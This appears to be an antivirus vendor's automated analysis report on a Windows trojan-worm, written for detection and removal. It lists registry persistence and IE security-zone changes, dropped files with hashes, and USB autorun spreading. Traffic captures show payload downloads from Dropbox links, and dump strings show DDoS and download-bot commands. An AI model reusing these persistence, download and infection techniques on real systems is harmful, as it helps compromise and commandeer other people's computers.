[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\L75C]
"hggjgh.exe" = "hggjgh"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process iexplorer.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\ASProtect]
"Microsoft" = "iexplorer.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 95 6A 96 FF 85 5B C8 1C 64 4E E0 63 AD 95 FF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process iexplorer.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F0 DF 4F FA C7 18 F0 8C 56 BB 24 8E 9F AF 51"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
c2f4665324cbe99a8845e51ea22ec2e5 | c:\Documents and Settings\"%CurrentUserName%"\J50H\20.exe |
a49236b08836f4a372b842ead2643c5b | c:\Documents and Settings\"%CurrentUserName%"\J50H\rep.exe |
30629889480fb1c2aeb17e62f01c8a47 | c:\Documents and Settings\"%CurrentUserName%"\L75C\hggjgh.exe |
d7f364e0153aadb8cc37f09b3fe4d3ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe |
93a561b4d6e39d2b962ef9bcf45fba63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe |
a49236b08836f4a372b842ead2643c5b | c:\WINDOWS\csrss.exe |
93a561b4d6e39d2b962ef9bcf45fba63 | c:\WINDOWS\system.exe |
c2f4665324cbe99a8845e51ea22ec2e5 | c:\WINDOWS\system32\iexplorer.exe |
30629889480fb1c2aeb17e62f01c8a47 | c:\WINDOWS\system32\pwyqire.exe |
d7f364e0153aadb8cc37f09b3fe4d3ec | c:\WINDOWS\systemj.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\csrss.exe (5441 bytes)
%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)
%System%\iexplorer.exe (5873 bytes)
%System%\pwyqire.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)
%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)
%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
.rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
.data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
.CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
.rsrc | 192512 | 16660 | 16896 | 3.52343 | a2121b436cc4d10fcdfe9bc7fe4dbc2f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.v.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 | |
hxxp://www.v.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt | |
hxxp://www.whatismyip.com/ | 141.101.120.14 |
hxxp://checkip.dyndns.com/ | |
hxxp://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 | 108.160.167.202 |
hxxp://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 | 108.160.167.202 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 212.30.134.177 |
hxxp://checkip.dyndns.org/ | 216.146.43.70 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt | 212.30.134.177 |
videos.p0rn-lover.us | 5.39.78.105 |
frozynv.odin2-valhall.com | 23.236.134.61 |
dl.dropboxusercontent.com | 23.23.132.156 |
vids.p0rn-lover.us | 5.39.78.105 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f54a000551-VIE
2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0..HTTP/1.1 403 Forbidden..Server: cloudflare-nginx..Date: Tue, 29 Jul 2014 22:51:01 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly..Vary: Accept-Encoding..CF-RAY: 151ce0f54a000551-VIE..2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56f
<<
<<< skipped >>>
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=2736
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 18..Cache-Control: max-age=2736..Date: Tue, 29 Jul 2014 22:50:46 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..1401CF3DB40B609892..
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f54a010551-VIE
2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0......
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 29 Jul 2014 22:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5ef63b2783e4be02942676df66a2d2e71406674261595; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 151ce0f6fa580551-VIE
2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0..HTTP/1.1 403 Forbidden..Server: cloudflare-nginx..Date: Tue, 29 Jul 2014 22:51:01 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d5ef63b2783e4be02942676df66a2d2e71406674261595; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly..Vary: Accept-Encoding..CF-RAY: 151ce0f6fa580551-VIE..2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56f
<<
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=2736
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892....
GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT
Accept-Ranges: bytes
ETag: "05a791e6fc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1028
Date: Tue, 29 Jul 2014 22:50:46 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0.. 0...*.H.............0............W.I.[.._H.......g..eh.Wq.^w...I.p.=V.c.o....?..T"T......u=K..w.>x.... k/j ...~......E'o.7X..&..-.....r6N..?e...*n].............:.....-..._.=.....\.e8.E...``t.A.rb.b..o_.B..Qe..#.j.x..M.....Z..@........^s..w...y....g.....X.D{.>b(_.A.SX..~8t....i...t..........0..0...U............L.q.a.=....j..0....U.#...0..........L.q.a.=....j...g.e0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority...0...U....0....0...*.H.............2K...>........w.3..\......=......ni...0.4.cr8.......(.1.z.T...1X....b..Es..E.$.....#yi...M..L.3#......An.. ....;.p.~.& .T%.ns...!..l.........l......a.... .....r9. ......n...N&.s ...L.&q.a.tJ.W...uH..Qi....a...@..L....C......b......2.. .E...(...*ZW.7.......HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT..Accept-Ranges: bytes..ETag: "05a791e6fc51:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 1028..Date: Tue, 29 Jul 2014 22:50:46 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The
<<
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT
Accept-Ranges: bytes
ETag: "05a791e6fc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1028
Date: Tue, 29 Jul 2014 22:50:47 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0.. 0...*.H.............0............W.I.[.._H.......g..eh.Wq.^w...I.p.=V.c.o....?..T"T......u=K..w.>x.... k/j ...~......E'o.7X..&..-.....r6N..?e...*n].............:.....-..._.=.....\.e8.E...``t.A.rb.b..o_.B..Qe..#.j.x..M.....Z..@........^s..w...y....g.....X.D{.>b(_.A.SX..~8t....i...t..........0..0...U............L.q.a.=....j..0....U.#...0..........L.q.a.=....j...g.e0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority...0...U....0....0...*.H.............2K...>........w.3..\......=......ni...0.4.cr8.......(.1.z.T...1X....b..Es..E.$.....#yi...M..L.3#......An.. ....;.p.~.& .T%.ns...!..l.........l......a.... .....r9. ......n...N&.s ...L.&q.a.tJ.W...uH..Qi....a...@..L....C......b......2.. .E...(...*ZW.7.......HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT..Accept-Ranges: bytes..ETag: "05a791e6fc51:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 1028..Date: Tue, 29 Jul 2014 22:50:47 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The
<<
<<< skipped >>>
GET /s/yec4ibud71nzl4k/120.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.dropbox.com
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 29 Jul 2014 22:50:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx..Date: Tue, 29 Jul 2014 22:50:44 GMT..Content-Type: text/html..Content-Length: 178..Connection: keep-alive..Location: hXXps://VVV.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>......
GET /s/eniahgllsch8thw/rep.exe?dl=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.dropbox.com
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 29 Jul 2014 22:50:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 107
<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
pwyqire.exe_500:
.text
.text
`.rdata
`.rdata
@.data
@.data
_WSSh
_WSSh
t1SSSSh
t1SSSSh
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
%d. %s = %s
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
[DDoS]: Send error: <%d>.
ddos.random
ddos.random
ddos.ack
ddos.ack
ddos.syn
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
